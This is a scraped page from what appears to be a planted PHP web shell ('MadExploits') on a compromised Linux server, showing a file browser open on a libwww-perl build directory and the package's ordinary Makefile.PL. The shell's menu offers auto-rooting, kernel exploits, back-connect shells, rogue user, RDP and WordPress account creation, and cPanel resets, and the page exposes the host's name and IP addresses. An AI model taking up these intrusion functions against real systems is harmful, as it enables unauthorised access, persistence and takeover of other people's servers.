Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 216.73.216.226
46 Domain
7.2.34
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
.cpanplus /
5.16.3 /
build /
libwww-perl-6.46 /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
blib
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
xt
[ DIR ]
drwxr-xr-x
CONTRIBUTING.md
5.5
KB
-rw-r--r--
Changes
119.11
KB
-rw-r--r--
INSTALL
2.18
KB
-rw-r--r--
LICENSE
17.91
KB
-rw-r--r--
MANIFEST
2.16
KB
-rw-r--r--
META.json
33.42
KB
-rw-r--r--
META.yml
22.27
KB
-rw-r--r--
MYMETA.json
33.54
KB
-rw-r--r--
MYMETA.yml
22.31
KB
-rw-r--r--
Makefile
41.29
KB
-rw-r--r--
Makefile.PL
5.12
KB
-rw-r--r--
README.SSL
383
B
-rw-r--r--
cpanfile
1.56
KB
-rw-r--r--
dist.ini
6.55
KB
-rw-r--r--
lwpcook.pod
9.05
KB
-rw-r--r--
lwptut.pod
24.37
KB
-rw-r--r--
pm_to_blib
0
B
-rw-r--r--
talk-to-ourself
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.PL
# This Makefile.PL for libwww-perl was generated by # Dist::Zilla::Plugin::MakeMaker::Awesome 0.48. # Don't edit it but the dist.ini and plugins used to construct it. use strict; use warnings; use 5.008001; use ExtUtils::MakeMaker; use Getopt::Long qw(GetOptions); GetOptions(\my %opt, 'aliases', 'no-programs|n', ) or do { die "Usage: $0 [--aliases] [--no-programs]\n"; }; my @prog; push(@prog, qw(lwp-request lwp-mirror lwp-download lwp-dump)) unless $opt{'no-programs'} || grep /^LIB=/, @ARGV; if ($opt{'aliases'} && grep(/lwp-request/, @prog)) { require File::Copy; for (qw(GET HEAD POST)) { File::Copy::copy("bin/lwp-request", "bin/$_") || die "Can't copy bin/$_"; chmod(0755, "bin/$_"); push(@prog, $_); } } my %WriteMakefileArgs = ( "ABSTRACT" => "The World-Wide Web library for Perl", "AUTHOR" => "Gisle Aas <gisle\@activestate.com>", "CONFIGURE_REQUIRES" => { "CPAN::Meta::Requirements" => "2.120620", "ExtUtils::MakeMaker" => 0, "File::Copy" => 0, "Getopt::Long" => 0, "Module::Metadata" => 0 }, "DISTNAME" => "libwww-perl", "EXE_FILES" => [ "bin/lwp-download", "bin/lwp-dump", "bin/lwp-mirror", "bin/lwp-request" ], "LICENSE" => "perl", "MIN_PERL_VERSION" => "5.008001", "NAME" => "libwww::perl", "PREREQ_PM" => { "Digest::MD5" => 0, "Encode" => "2.12", "Encode::Locale" => 0, "File::Listing" => 6, "HTML::Entities" => 0, "HTML::HeadParser" => 0, "HTTP::Cookies" => 6, "HTTP::Daemon" => 6, "HTTP::Date" => 6, "HTTP::Negotiate" => 6, "HTTP::Request" => 6, "HTTP::Request::Common" => 6, "HTTP::Response" => 6, "HTTP::Status" => 6, "IO::Select" => 0, "IO::Socket" => 0, "LWP::MediaTypes" => 6, "MIME::Base64" => "2.1", "Net::FTP" => "2.58", "Net::HTTP" => "6.18", "Scalar::Util" => 0, "Try::Tiny" => 0, "URI" => "1.10", "URI::Escape" => 0, "WWW::RobotRules" => 6, "base" => 0, "strict" => 0, "warnings" => 0 }, "TEST_REQUIRES" => { "ExtUtils::MakeMaker" => 0, "File::Spec" => 0, "FindBin" => 0, "Test::Fatal" => 0, "Test::More" => 0, "Test::Needs" => 0, "Test::RequiresInternet" => 0 }, "VERSION" => "6.46", "test" => { "TESTS" => "t/*.t t/base/*.t t/base/protocols/*.t t/leak/*.t t/local/*.t t/robot/*.t" } ); %WriteMakefileArgs = ( %WriteMakefileArgs, EXE_FILES => [ map "bin/$_", @prog ], ); my %FallbackPrereqs = ( "Digest::MD5" => 0, "Encode" => "2.12", "Encode::Locale" => 0, "ExtUtils::MakeMaker" => 0, "File::Listing" => 6, "File::Spec" => 0, "FindBin" => 0, "HTML::Entities" => 0, "HTML::HeadParser" => 0, "HTTP::Cookies" => 6, "HTTP::Daemon" => 6, "HTTP::Date" => 6, "HTTP::Negotiate" => 6, "HTTP::Request" => 6, "HTTP::Request::Common" => 6, "HTTP::Response" => 6, "HTTP::Status" => 6, "IO::Select" => 0, "IO::Socket" => 0, "LWP::MediaTypes" => 6, "MIME::Base64" => "2.1", "Net::FTP" => "2.58", "Net::HTTP" => "6.18", "Scalar::Util" => 0, "Test::Fatal" => 0, "Test::More" => 0, "Test::Needs" => 0, "Test::RequiresInternet" => 0, "Try::Tiny" => 0, "URI" => "1.10", "URI::Escape" => 0, "WWW::RobotRules" => 6, "base" => 0, "strict" => 0, "warnings" => 0 ); # inserted by Dist::Zilla::Plugin::DynamicPrereqs 0.037 requires('HTTP::Status', '6.18') if has_module('HTTP::Status', '6.17'); unless ( eval { ExtUtils::MakeMaker->VERSION('6.63_03') } ) { delete $WriteMakefileArgs{TEST_REQUIRES}; delete $WriteMakefileArgs{BUILD_REQUIRES}; $WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs; } delete $WriteMakefileArgs{CONFIGURE_REQUIRES} unless eval { ExtUtils::MakeMaker->VERSION(6.52) }; WriteMakefile(%WriteMakefileArgs); # inserted by Dist::Zilla::Plugin::DynamicPrereqs 0.037 sub _add_prereq { my ($mm_key, $module, $version_or_range) = @_; $version_or_range ||= 0; warn "$module already exists in $mm_key (at version $WriteMakefileArgs{$mm_key}{$module}) -- need to do a sane metamerge!" if exists $WriteMakefileArgs{$mm_key}{$module} and $WriteMakefileArgs{$mm_key}{$module} ne '0' and $WriteMakefileArgs{$mm_key}{$module} ne $version_or_range; warn "$module already exists in FallbackPrereqs (at version $FallbackPrereqs{$mm_key}{$module}) -- need to do a sane metamerge!" if exists $FallbackPrereqs{$module} and $FallbackPrereqs{$module} ne '0' and $FallbackPrereqs{$module} ne $version_or_range; $WriteMakefileArgs{$mm_key}{$module} = $FallbackPrereqs{$module} = $version_or_range; return; } sub has_module { my ($module, $version_or_range) = @_; require Module::Metadata; my $mmd = Module::Metadata->new_from_module($module); return undef if not $mmd; return $mmd->version($module) if not defined $version_or_range; require CPAN::Meta::Requirements; my $req = CPAN::Meta::Requirements->new; $req->add_string_requirement($module => $version_or_range); return 1 if $req->accepts_module($module => $mmd->version($module)); return 0; } sub requires { goto &runtime_requires } sub runtime_requires { my ($module, $version_or_range) = @_; _add_prereq(PREREQ_PM => $module, $version_or_range); }
Close